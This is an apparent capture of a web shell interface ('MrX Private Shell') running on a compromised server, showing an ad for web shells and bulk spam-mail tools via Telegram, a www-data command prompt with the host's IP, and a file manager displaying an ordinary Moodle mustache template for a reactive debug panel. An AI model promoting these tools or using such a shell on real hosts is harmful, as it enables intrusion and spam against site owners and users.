__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
{{!
    This file is part of Moodle - http://moodle.org/

    Moodle is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    Moodle is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with Moodle.  If not, see <http://www.gnu.org/licenses/>.
}}
{{!
    @template core/local/reactive/debuginstancepanel

    Template to render the global reactive debug panel.

    Classes required for JS:
    * none

    Data attributes required for JS:
    * none

    Example context (json):
    {
        "id": "instanceid"
    }
}}
<div id="{{uniqid}}-reactive-debugpanel-instance" data-id="{{id}}" class="card text-dark">
    <div class="card-body">
        <h5 class="card-title" data-for="name">
            {{id}}
            <button href="#" class="btn btn-secondary" data-for="pin" data-alt="{{#str}} reactive_pin , core_debug {{/str}}">
                {{#str}} reactive_unpin , core_debug {{/str}}
            </button>
            <button href="#" class="btn btn-danger float-end" data-for="close">
                {{#str}} close , admin {{/str}}
            </button>
        </h5>
        <p class="card-text">
            <button
                class="btn btn-secondary"
                data-for="highlight"
                data-alt="{{#str}} reactive_highlighton , core_debug {{/str}}"
            >
                {{#str}} reactive_highlightoff , core_debug {{/str}}
            </button>
            <button
                class="btn btn-secondary"
                data-for="readmode"
                data-alt="{{#str}} reactive_readmodeoff , core_debug {{/str}}"
            >
                {{#str}} reactive_readmodeon , core_debug {{/str}}
            </button>
            <button
                class="btn btn-secondary"
                data-for="clean"
            >
                {{#str}} reactive_resetpanel , core_debug {{/str}}
            </button>
        </p>
        <div>
            <h6>
                {{#str}} reactive_statedata , core_debug {{/str}}
                <button class="btn btn-secondary" data-for="save" disabled>
                    {{#str}} save , admin {{/str}}
                </button>
                <span data-for="invalid">{{#str}} reactive_saveingwarning , core_debug {{/str}}</span>
            </h6>
            <textarea class="w-100" style="resize:vertical; height: 20em;" data-for="state" draggable="false"></textarea>
        </div>
        <div>
            <h6>State events log</h6>
            <textarea class="w-100" style="resize:vertical; height: 20em;" data-for="log" draggable="false"></textarea>
        </div>
  </div>
</div>
{{#js}}
require(['core/local/reactive/debugpanel'], function(component) {
    component.initsubpanel('{{uniqid}}-reactive-debugpanel-instance');
});
{{/js}}

Filemanager

Name Type Size Permission Actions
debuginstancepanel.mustache File 3.13 KB 0777
debugpanel.mustache File 1.43 KB 0777
overlay.mustache File 1.27 KB 0777
Filemanager